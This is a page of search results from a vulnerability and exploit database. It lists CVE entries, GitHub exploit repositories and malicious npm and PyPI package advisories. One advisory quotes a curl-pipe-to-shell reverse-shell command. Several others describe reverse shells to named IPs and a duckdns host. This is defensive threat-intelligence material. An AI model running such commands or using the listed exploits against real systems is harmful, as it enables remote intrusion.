CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

1830 matches found

GithubExploit•added 2026/05/24 5:21 p.m.•71 views

ClipBucket-EDB-44250

ClipBucket-EDB-44250 Unauthenticated Remote Code Execution in...

6AI score

Exploits0

GithubExploit•added 2026/05/22 4:36 p.m.•92 views

Exploit for Unrestricted Upload of File with Dangerous Type in Wordpress

WordPress Crop Image RCE — CVE-2019-8942 / CVE-2019-8943 Pyth...

8.8CVSS5.9AI score0.91985EPSS

Exploits10

OSSF Malicious Packages•added 2026/05/22 1:24 a.m.•13 views

Malicious code in internallib_v493 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...

5.8AI score

Exploits0References3

OSV•added 2026/05/22 1:24 a.m.•3 views

MAL-2026-4585 Malicious code in internallib_v493 (npm)

5.8AI score

Exploits0References3

OSSF Malicious Packages•added 2026/05/20 1:55 p.m.•9 views

Malicious code in randomlogs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c085eee0876092131c3f909facc237674fcfb1e02bafbafcb34230c87b3a3819 The package's main module index.js lines 6-10 exports a function mal that opens a TCP socket to 223.229.156.10:5513 and pipes a spawned shell /bin/sh...

5.8AI score

Exploits0References4

OSV•added 2026/05/20 1:55 p.m.•11 views

MAL-2026-4657 Malicious code in randomlogs (npm)

5.8AI score

Exploits0References4

GithubExploit•added 2026/05/20 12:54 p.m.•73 views

Exploit for Path Traversal in Gogs

CVE-2025-8110 PoC Python proof-of-concept script for triggerin...

8.8CVSS7.4AI score0.7694EPSS

Exploits14

GithubExploit•added 2026/05/18 12:59 a.m.•56 views

Exploit for Improper Input Validation in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

🚀 Automated Log4Shell CVE-2021-44228 Play & Plug Lab An aut...

10CVSS7.4AI score0.99999EPSS

Exploits346

CVE•added 2026/05/17 12:11 p.m.•12 views

CVE-2018-25320

CVE-2018-25320 affects ACL Analytics 11.x through 13.0.0.579. The vulnerability is an arbitrary code execution via the EXECUTE function, enabling an attacker to run commands with SYSTEM privileges. Reported chain includes using bitsadmin to download malicious PowerShell scripts and execute them t...

9.8CVSS6.5AI score0.00576EPSS

Exploits0References4

CNNVD•added 2026/05/17 12:0 a.m.•8 views

ACL Analytics 代码注入漏洞

ACL Analytics is a data analysis platform provided by ACL Corporation, which supports audit analysis, data mining, and risk monitoring. Versions 11.x to 13.0.0.579 of ACL Analytics have a code injection vulnerability. This vulnerability stems from the use of the EXECUTE function, which may allow...

9.8CVSS6.2AI score0.00576EPSS

Exploits0References1

GithubExploit•added 2026/05/16 6:8 p.m.•91 views

Exploit for CVE-2021-33393

IPFire2.25RCEAuthenticated This exploit is based on CVE-202...

9CVSS7.3AI score0.58725EPSS

Exploits6

GithubExploit•added 2026/05/15 12:26 p.m.•56 views

SECpocs

Next.js React Server Components RCE Exploit Exploits CVE-2025...

10CVSS6.4AI score0.99562EPSS

Exploits369

OSSF Malicious Packages•added 2026/05/14 7:25 p.m.•10 views

Malicious code in request-logger-canary (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cf0d566d7abb400988aea74b00099a6db4c5ea928f32e7d44648193e21a36035 [email protected] ships a preinstall.js that, when npm install runs, opens a TCP socket to 52.74.242.200:8851 and pipes an interactive...

5.9AI score

Exploits0References1

OSV•added 2026/05/14 7:25 p.m.•8 views

MAL-2026-3771 Malicious code in request-logger-canary (npm)

5.9AI score

Exploits0References1

GithubExploit•added 2026/05/14 12:37 p.m.•100 views

Exploit for CVE-2026-42945

NGINX Rift RCE Exploit CVE-2026-42945 A professional Proof-...

9.2CVSS6.2AI score0.23018EPSS

Exploits39

OSSF Malicious Packages•added 2026/05/13 4:32 p.m.•13 views

Malicious code in workingitmehelpit (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 3e553fe0eea72dc43eab2696330acd6fbb3e4de8c95529eab6298411620c0c9f Package installs malware identified as a backdoor or reverse shell. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers...

6AI score

Exploits0References3

OSV•added 2026/05/13 4:32 p.m.•3 views

MAL-2026-3664 Malicious code in workingitmehelpit (PyPI)

6AI score

Exploits0References3

OSSF Malicious Packages•added 2026/05/12 11:39 a.m.•9 views

Malicious code in kaggle-runner (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8dcd49ca70b987b236ba4341d839addfec9afb344e1471195f2f825281092f71 kagglerunner/coordinator.py embeds a bash reverse-shell template rvsstr that connects to vtool.duckdns.org:23454 via ncat with retry/backoff plus a...

5.8AI score

Exploits0References1

OSV•added 2026/05/12 11:39 a.m.•5 views

MAL-2026-3693 Malicious code in kaggle-runner (PyPI)

5.8AI score

Exploits0References1

GithubExploit•added 2026/05/12 4:45 a.m.•79 views

Maltrail-v0.53-Exploit

Maltrail v0.53 — Command Injection Exploit I wrote this explo...

6.5CVSS6.1AI score0.07497EPSS

Exploits29

Rows per page